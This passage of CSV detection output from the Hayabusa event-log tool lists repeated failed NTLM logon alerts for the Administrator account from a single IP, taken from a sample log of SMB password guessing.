3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 
